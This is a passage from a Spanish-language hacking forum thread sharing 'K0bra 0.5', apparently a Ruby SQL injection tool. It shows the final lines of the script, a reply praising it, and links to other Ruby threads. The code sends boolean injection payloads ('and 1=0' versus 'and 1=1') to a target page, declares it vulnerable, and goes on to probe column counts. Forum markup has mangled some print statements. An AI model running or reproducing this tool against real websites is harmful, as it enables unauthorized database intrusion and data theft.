    497.   codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
    498.   codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
    499.   if codeuno != codedos
    500.     print "</li><li type="square"> Vulnerable !\n"[/li][/list]
    501.     findlength(page,by)
    502.   else
    503.     print "[-] Not vulnerable\n"
    504.     print "\n</li><li type="square"> Scan anyway y/n : "[/li][/list]
    505.     op = gets.chomp
    506.     if op == "y"
    507.       findlength(page,by)
    508.     else
    509.       volverinicio()
    510.   end
    511.  end  
    512. end
    513.  
    514. def inicio()
    515.   clean()
    516.   head()
    517.   print "\n\n</li><li type="square"> Page : "[/li][/list]
    518.   page = gets.chomp
    519.   print "\n</li><li type="square"> Bypass : "[/li][/list]
    520.   by = gets.chomp
    521.   if page=~/hackman/
    522.     central(page,by)
    523.   else
    524.     testvul(page,by)
    525.   end
    526. end
    527.  
    528. installer()
    529. inicio()
    530.  
    531. # The End ?
    532.  

    Eso es todo.

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1975
  • Actividad:
    30%
  • Country: es
  • Reputación 16
    • Ver Perfil

Re:[Ruby] K0bra 0.5

  • en: Julio 26, 2015, 07:15:11 am
Que genial aporte, muy buena @Doddy, luego la pruebo :D

Saludos.


 

[Ruby] Traductor de Decimal a Ascii / Ascii a Decimal

Iniciado por ANTRAX

Respuestas: 0
Vistas: 2852
Último mensaje Febrero 24, 2010, 04:16:38 pm
por ANTRAX
Lenguaje Ruby, aprendiendo poco a poco.

Iniciado por Alejandro_99

Respuestas: 2
Vistas: 3158
Último mensaje Agosto 15, 2013, 02:58:39 pm
por Alejandro_99
Crafting rails 4 applications (Manual de Ruby on Rails 4)

Iniciado por Alejandro_99

Respuestas: 0
Vistas: 1994
Último mensaje Marzo 01, 2014, 05:34:50 pm
por Alejandro_99
Desarrollo de aplicaciones Perl, PHP, Python y "Ruby on Rails"

Iniciado por Alejandro_99

Respuestas: 0
Vistas: 2474
Último mensaje Junio 13, 2014, 03:27:08 pm
por Alejandro_99
Como Instalar RubyMine y Crear un proyecto vacio para Ruby y Rails

Iniciado por Alejandro_99

Respuestas: 0
Vistas: 2898
Último mensaje Julio 07, 2013, 10:51:08 pm
por Alejandro_99